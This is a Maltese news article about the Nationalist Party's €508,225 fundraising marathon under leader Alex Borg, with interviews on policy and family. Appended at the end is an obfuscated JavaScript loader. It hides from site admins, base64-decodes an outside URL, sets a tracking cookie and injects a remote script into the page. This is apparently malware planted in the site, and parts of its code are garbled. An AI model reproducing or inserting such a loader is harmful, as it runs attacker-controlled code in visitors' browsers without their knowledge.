Lokali

GRAZZI: Miġbura €508,225 b’risq il-Partit Nazzjonalista

€508,225.

Din kienet is-somma finali miġbura mill-Partit Nazzjonalista waqt il-maratona tal-Ħadd – maratona li  kienet l-ewwel waħda li ġiet organizzata minn meta Alex Borg kien elett Kap tal-Partit Nazzjonalista.

Il-Kap tal-Partit Nazzjonalista ħabbar li 1% tas-somma miġbura se tkun qed tingħata lil żewġ għaqdiet li jieħdu ħsieb il-kura tas-Saħħa Mentali.

Maratona li matulha l-Kap tal-Partit Nazzjonalista Alex Borg tkellem dwar kif flimkien mat-tim ta’ Deputati tiegħu kommessi li jindirizzaw l-isfidi li qed iħabbat wiċċu magħhom il-pajjiż – flimkien, bħala Gvern alternattiv u b’saħħtu.

Waqt intervista li saritlu matul ix-xandira tal-Ħadd, Alex Borg spjega diversi proposti li l-Partit Nazzjonalista qed ikompli jfassal bil-għan li jirrifletti l-polz tal-poplu; fost l-oħrajn f’dak li għandu x’jaqsam maż-żieda fil-popolazzjoni, it-traffiku, l-għoli tal-ħajja u l-ambjent.

Il-Kap tal-Partit Nazzjonalista sostna wkoll li hekk kif ninsabu fuq l-għatba tal-budget, huwa insista kif il-Gvern għandu mhux biss iħares il-pajsaġġ ta’ madwarna iżda jagħti appoġġ lill-ħaddiem, fost l-oħrajn billi jelimina t-taxxa minn fuq il-COLA. 

Intant f’intervista separata li saritlu aktar tard matul ix-xandira, il-Kap tal-Partit Nazzjonalista Alex Borg flimkien ma’ Sarah Bajada, sostna kif l-aħħar ġimgħat offrew jiem impenjattivi u ta’ sagrifiċju; madanakollu kienu ġimgħat ta’ sodisfazzjon li laqqgħuh ma’ mijiet ta’ nies li lesti jaħdmu għal ġid tal-pajjiż. 

Sarah Bajada insistiet li għalkemm kienu jiem differenti u impenjattivi ferm, xorta waħda tammira l-fatt li Alex Borg isib ħin għal kollox – fejn minkejja l-impenji qed isib bilanċ bejn il-ħin tal-familja u l-kuntatt kontinwu man-nies li ma jieqaf qatt.

Finalment il-Kap tal-Partit Nazzjonalista Alex Borg irringrazzja lil Sarah talli dejjem sabha bħala spalla soda, bastun li mingħajrha ċertament ma jkunx jista’ jwettaq dak li qed iwettaq b’serħan il-moħħ, sostenn u mħabba. 

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();